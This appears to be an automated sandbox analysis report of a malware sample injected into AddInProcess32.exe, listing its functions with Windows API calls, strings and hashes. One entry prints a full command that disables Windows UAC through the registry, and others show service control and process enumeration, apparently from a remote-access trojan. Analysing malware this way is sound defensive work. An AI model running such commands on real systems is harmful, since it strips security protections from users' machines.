                                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                        • String ID:
                                        • API String ID: 3950776272-0
                                        • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                        • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                        Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                        • Opcode Fuzzy Hash: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                        Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                        • String ID:
                                        • API String ID: 493672254-0
                                        • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                        • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                        Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                        • _free.LIBCMT ref: 0044824C
                                        • _free.LIBCMT ref: 00448274
                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                        • _abort.LIBCMT ref: 00448293
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                        • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                        Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                        • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                        Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                        • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                        Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                        • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                        Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                        • GetLastError.KERNEL32 ref: 0041D580
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                        Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                        • CloseHandle.KERNEL32(?), ref: 004077AA
                                        • CloseHandle.KERNEL32(?), ref: 004077AF
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                        • API String ID: 2922976086-4183131282
                                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                        Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                        Download Yara Rule
                                        Strings
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076C4
                                        • SG, xrefs: 004076DA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        • API String ID: 0-1732489412
                                        • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                        • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                        Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                        Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                        • String ID: KeepAlive | Disabled
                                        • API String ID: 2993684571-305739064
                                        • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                        • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                        Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                        Strings
                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                        • API String ID: 3024135584-2418719853
                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                        Function 0040140A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll$`#v
                                        • API String ID: 1646373207-1032071883
                                        • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                        • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                        • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                        • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                        Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                        • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                        Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • _free.LIBCMT ref: 00444E06
                                        • _free.LIBCMT ref: 00444E1D
                                        • _free.LIBCMT ref: 00444E3C
                                        • _free.LIBCMT ref: 00444E57
                                        • _free.LIBCMT ref: 00444E6E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$AllocateHeap
                                        • String ID:
                                        • API String ID: 3033488037-0
                                        • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                        • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                        Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                        • _free.LIBCMT ref: 004493BD
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00449589
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                        Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 4269425633-0
                                        • Opcode ID: 5e5e8e19cee375d44ca851dd311087b36f73d333cf6257bebe020e348e09cec7
                                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                        • Opcode Fuzzy Hash: 5e5e8e19cee375d44ca851dd311087b36f73d333cf6257bebe020e348e09cec7
                                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                        Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                        Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                        • __freea.LIBCMT ref: 0045121D
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
